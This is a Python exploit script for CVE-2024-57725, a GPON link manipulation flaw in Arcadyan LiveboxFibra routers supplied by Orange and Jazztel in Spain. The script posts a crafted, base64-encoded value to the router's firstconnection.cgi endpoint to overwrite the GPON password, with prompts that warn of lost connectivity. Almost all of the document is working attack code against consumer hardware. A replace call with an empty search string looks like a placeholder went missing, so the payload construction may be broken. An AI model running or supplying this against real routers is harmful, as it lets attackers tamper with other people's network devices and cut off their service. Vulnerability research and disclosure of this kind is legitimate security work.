#!/usr/bin/python3 # # Exploit Title: GPON Link Manipulation Vulnerability in Arcadyan Routers (Distributed by Orange and Jazztel) # Date: 01/14/2025 # Exploit Author: pointedsec # Vendor Homepage: https://www.arcadyan.com # Affected ISPs: Orange and Jazztel (Spain) # Tested on: Arcadyan routers distributed by Orange and Jazztel - LiveboxFibra (PRV3399B_B_LT) # CVE: CVE-2024-57725 # import requests import base64 ROUTER_IP = "192.168.1.1" CHANGE_ONT_PATH = "/firstconnection.cgi" GPON_NEW_PASSWORD = "a" HEX_PADDING = 20 def text_to_padded_hex(text, total_chars): hex_value = text.encode("utf-8").hex() padding_needed = total_chars - len(hex_value) if padding_needed < 0: raise ValueError("El texto en hexadecimal supera el nĂºmero de caracteres deseado.") padded_hex = "0" * padding_needed + hex_value return padded_hex def main(): data = "GO=firstconnection.htm&pws=&GO=firstconnection.htm" headers = { 'Content-Type': 'text/plain;charset=UTF-8' } # Convert necessary data padded_hex = text_to_padded_hex(GPON_NEW_PASSWORD, HEX_PADDING) base64_value = base64.b64encode(padded_hex.encode("utf-8")).decode("utf-8") print("[i] Padded hex: %s ; base64 value: %s" % (padded_hex, base64_value)) # Extra confirmation confirm = input("[i] This will change your liveboxfibra GPON password and will cause connectivity issues, make sure you've got the original GPON password, want to proceed? (yes or no): ") if confirm == "no": print("[i] Exiting...") exit(0) # Change GPON Password payload = data.replace("", base64_value) r = requests.post("http://" + ROUTER_IP + CHANGE_ONT_PATH, headers=headers, data=payload) if r.status_code == 200: print("[i] GPON Password Changed! Wait a few seconds and check the new password with check_ont_value.py") if __name__ == "__main__": confirm = input("[i] Are you sure? This would cause connectivity issues, first backup the GPON password (yes or no): ") if confirm == "yes": main() else: print("[i] Exiting...") exit(0)